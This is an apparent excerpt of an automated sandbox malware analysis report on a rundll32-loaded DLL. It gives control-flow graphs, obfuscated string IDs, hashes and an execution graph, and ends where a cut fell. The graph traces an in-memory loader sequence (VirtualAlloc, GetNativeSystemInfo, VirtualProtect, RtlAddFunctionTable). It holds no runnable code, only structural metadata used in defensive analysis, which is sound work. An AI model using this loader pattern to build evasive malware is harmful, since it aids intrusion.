                                                                                                                                      control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 581 1800061ab-1800061b0 570->581 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 577 180005a25-180005a2a 572->577 578 180005da6-180005fb1 call 1800093f0 572->578 573->569 579 1800061bb-18000625a call 180001b1c 577->579 580 180005a30-180005a35 577->580 593 180005fc3-180005fc8 578->593 594 180005fb3-180005fbe 578->594 587 18000625f-180006271 579->587 584 180005a3b-180005a40 580->584 585 180005d7e-180005d8c 580->585 586 1800061b6 581->586 581->587 590 180005a46-180005a4b 584->590 591 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 584->591 592 180005d92-180005d96 585->592 586->569 595 180005a51-180005a56 590->595 596 180005ad8-180005b68 call 18000abac 590->596 591->569 597 180005d98-180005da1 592->597 598 180005d8e-180005d8f 592->598 593->569 594->569 595->581 600 180005a5c-180005ad3 call 180007958 595->600 596->587 607 180005b6e-180005b73 596->607 597->569 598->592 600->569 607->569
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                      • API String ID: 0-2100131636
                                                                                                                                      • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                      • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                      • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                      • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                      • API String ID: 0-2401169580
                                                                                                                                      • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                      • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                      • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                      • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                      • API String ID: 0-1318892062
                                                                                                                                      • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                      • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                      • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                      • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 688 18001fc62-18001fc67 683->688 689 18001fde5-18001fe8f call 180012598 683->689 702 1800201fe-180020203 684->702 690 1800200b6-180020164 call 180012598 685->690 691 18001ff29-18001ff2e 685->691 697 18002020a-18002026b call 1800190d4 688->697 698 18001fc6d-18001fc72 688->698 689->679 690->679 692 1800200a1-1800200b1 call 1800014f8 691->692 693 18001ff34-18001ff39 691->693 692->679 700 180020003-180020091 call 180021434 693->700 701 18001ff3f-18001ff44 693->701 711 180020270-180020291 697->711 706 18001fc78-18001fc7d 698->706 707 18001fd57-18001fde0 call 180012598 698->707 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 717 18001fc8e-18001fd1a call 18001e938 715->717 716->679 717->679 723->679
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                      • API String ID: 0-3477398917
                                                                                                                                      • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                      • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                      • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                      • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: JQ$k&($t$v$x\J
                                                                                                                                      • API String ID: 0-1134872184
                                                                                                                                      • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                      • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                      • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                      • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: R$)H8$?rIc$L==$V
                                                                                                                                      • API String ID: 0-2512384441
                                                                                                                                      • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                      • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                      • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                      • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Qq$bt$vird$+$S
                                                                                                                                      • API String ID: 0-3373980505
                                                                                                                                      • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                      • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                      • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                      • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: V$@$P9$^_"
                                                                                                                                      • API String ID: 0-1880944046
                                                                                                                                      • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                      • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                      • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                      • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =_$F)k$b/$syG
                                                                                                                                      • API String ID: 0-3955183656
                                                                                                                                      • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                      • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                      • API String ID: 0-746338152
                                                                                                                                      • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                      • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                      • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                      • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *i^$MIC$-Z$]2
                                                                                                                                      • API String ID: 0-498664264
                                                                                                                                      • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                      • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                      • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                      • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: B$EG$QsF$_
                                                                                                                                      • API String ID: 0-784369960
                                                                                                                                      • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                      • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                      • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                      • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                      • API String ID: 0-1363032466
                                                                                                                                      • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                      • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                      • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                      • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *+_$WSh$\O$#o
                                                                                                                                      • API String ID: 0-1846314129
                                                                                                                                      • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                      • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                      • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                      • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .B$O$M*K$\<
                                                                                                                                      • API String ID: 0-3225238681
                                                                                                                                      • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                      • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                      • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                      • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$$$xVO$~O
                                                                                                                                      • API String ID: 0-3655128719
                                                                                                                                      • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                      • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                      • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                      • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,IW$G$JMg$l
                                                                                                                                      • API String ID: 0-1370644289
                                                                                                                                      • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                      • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                      • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                      • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,$,$2S=$i`}G
                                                                                                                                      • API String ID: 0-4285990414
                                                                                                                                      • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                      • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                                                                                      • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                      • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:10.7%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:11
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 3264 2077eeb0000 3265 2077eeb0183 3264->3265 3266 2077eeb043e VirtualAlloc 3265->3266 3269 2077eeb0462 3266->3269 3267 2077eeb0531 GetNativeSystemInfo 3268 2077eeb056d VirtualAlloc 3267->3268 3272 2077eeb0a7b 3267->3272 3270 2077eeb058b 3268->3270 3269->3267 3269->3272 3271 2077eeb0a00 3270->3271 3274 2077eeb09d9 VirtualProtect 3270->3274 3271->3272 3273 2077eeb0a56 RtlAddFunctionTable 3271->3273 3273->3272 3274->3270

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 2077eeb0000-2077eeb0460 call 2077eeb0aa8 * 2 VirtualAlloc 22 2077eeb0462-2077eeb0466 0->22 23 2077eeb048a-2077eeb0494 0->23 24 2077eeb0468-2077eeb0488 22->24 26 2077eeb0a91-2077eeb0aa6 23->26 27 2077eeb049a-2077eeb049e 23->27 24->23 24->24 27->26 28 2077eeb04a4-2077eeb04a8 27->28 28->26 29 2077eeb04ae-2077eeb04b2 28->29 29->26 30 2077eeb04b8-2077eeb04bf 29->30 30->26 31 2077eeb04c5-2077eeb04d2 30->31 31->26 32 2077eeb04d8-2077eeb04e1 31->32 32->26 33 2077eeb04e7-2077eeb04f4 32->33 33->26 34 2077eeb04fa-2077eeb0507 33->34 35 2077eeb0531-2077eeb0567 GetNativeSystemInfo 34->35 36 2077eeb0509-2077eeb0511 34->36 35->26 38 2077eeb056d-2077eeb0589 VirtualAlloc 35->38 37 2077eeb0513-2077eeb0518 36->37 39 2077eeb0521 37->39 40 2077eeb051a-2077eeb051f 37->40 41 2077eeb05a0-2077eeb05ac 38->41 42 2077eeb058b-2077eeb059e 38->42 43 2077eeb0523-2077eeb052f 39->43 40->43 44 2077eeb05af-2077eeb05b2 41->44 42->41 43->35 43->37 46 2077eeb05c1-2077eeb05db 44->46 47 2077eeb05b4-2077eeb05bf 44->47 48 2077eeb05dd-2077eeb05e2 46->48 49 2077eeb061b-2077eeb0622 46->49 47->44 52 2077eeb05e4-2077eeb05ea 48->52 50 2077eeb0628-2077eeb062f 49->50 51 2077eeb06db-2077eeb06e2 49->51 50->51 53 2077eeb0635-2077eeb0642 50->53 54 2077eeb0864-2077eeb086b 51->54 55 2077eeb06e8-2077eeb06f9 51->55 56 2077eeb05ec-2077eeb0609 52->56 57 2077eeb060b-2077eeb0619 52->57 53->51 60 2077eeb0648-2077eeb064f 53->60 58 2077eeb0871-2077eeb087f 54->58 59 2077eeb0917-2077eeb0929 54->59 61 2077eeb0702-2077eeb0705 55->61 56->56 56->57 57->49 57->52 64 2077eeb090e-2077eeb0911 58->64 62 2077eeb092f-2077eeb0937 59->62 63 2077eeb0a07-2077eeb0a1a 59->63 65 2077eeb0654-2077eeb0658 60->65 66 2077eeb0707-2077eeb070a 61->66 67 2077eeb06fb-2077eeb06ff 61->67 69 2077eeb093b-2077eeb093f 62->69 88 2077eeb0a40-2077eeb0a4a 63->88 89 2077eeb0a1c-2077eeb0a27 63->89 64->59 68 2077eeb0884-2077eeb08a9 64->68 70 2077eeb06c0-2077eeb06ca 65->70 71 2077eeb0788-2077eeb078e 66->71 72 2077eeb070c-2077eeb071d 66->72 67->61 94 2077eeb0907-2077eeb090c 68->94 95 2077eeb08ab-2077eeb08b1 68->95 75 2077eeb0945-2077eeb095a 69->75 76 2077eeb09ec-2077eeb09fa 69->76 73 2077eeb065a-2077eeb0669 70->73 74 2077eeb06cc-2077eeb06d2 70->74 78 2077eeb0794-2077eeb07a2 71->78 77 2077eeb071f-2077eeb0720 72->77 72->78 84 2077eeb067a-2077eeb067e 73->84 85 2077eeb066b-2077eeb0678 73->85 74->65 80 2077eeb06d4-2077eeb06d5 74->80 82 2077eeb095c-2077eeb095e 75->82 83 2077eeb097b-2077eeb097d 75->83 76->69 86 2077eeb0a00-2077eeb0a01 76->86 87 2077eeb0722-2077eeb0784 77->87 90 2077eeb07a8 78->90 91 2077eeb085d-2077eeb085e 78->91 80->51 96 2077eeb0960-2077eeb096c 82->96 97 2077eeb096e-2077eeb0979 82->97 99 2077eeb09a2-2077eeb09a4 83->99 100 2077eeb097f-2077eeb0981 83->100 101 2077eeb0680-2077eeb068a 84->101 102 2077eeb068c-2077eeb0690 84->102 98 2077eeb06bd-2077eeb06be 85->98 86->63 87->87 103 2077eeb0786 87->103 92 2077eeb0a4c-2077eeb0a54 88->92 93 2077eeb0a7b-2077eeb0a8e 88->93 104 2077eeb0a38-2077eeb0a3e 89->104 105 2077eeb07ae-2077eeb07d4 90->105 91->54 92->93 107 2077eeb0a56-2077eeb0a79 RtlAddFunctionTable 92->107 93->26 94->64 116 2077eeb08b3-2077eeb08b9 95->116 117 2077eeb08bb-2077eeb08c8 95->117 108 2077eeb09be-2077eeb09bf 96->108 97->108 98->70 114 2077eeb09a6-2077eeb09aa 99->114 115 2077eeb09ac-2077eeb09bb 99->115 109 2077eeb0983-2077eeb0987 100->109 110 2077eeb0989-2077eeb098b 100->110 111 2077eeb06b6-2077eeb06ba 101->111 112 2077eeb0692-2077eeb06a3 102->112 113 2077eeb06a5-2077eeb06a9 102->113 103->78 104->88 106 2077eeb0a29-2077eeb0a35 104->106 126 2077eeb07d6-2077eeb07d9 105->126 127 2077eeb0835-2077eeb0839 105->127 106->104 107->93 122 2077eeb09c5-2077eeb09cb 108->122 109->108 110->99 120 2077eeb098d-2077eeb098f 110->120 111->98 112->111 113->98 121 2077eeb06ab-2077eeb06b3 113->121 114->108 115->108 123 2077eeb08ea-2077eeb08fe 116->123 124 2077eeb08d3-2077eeb08e5 117->124 125 2077eeb08ca-2077eeb08d1 117->125 128 2077eeb0991-2077eeb0997 120->128 129 2077eeb0999-2077eeb09a0 120->129 121->111 130 2077eeb09d9-2077eeb09e9 VirtualProtect 122->130 131 2077eeb09cd-2077eeb09d3 122->131 123->94 142 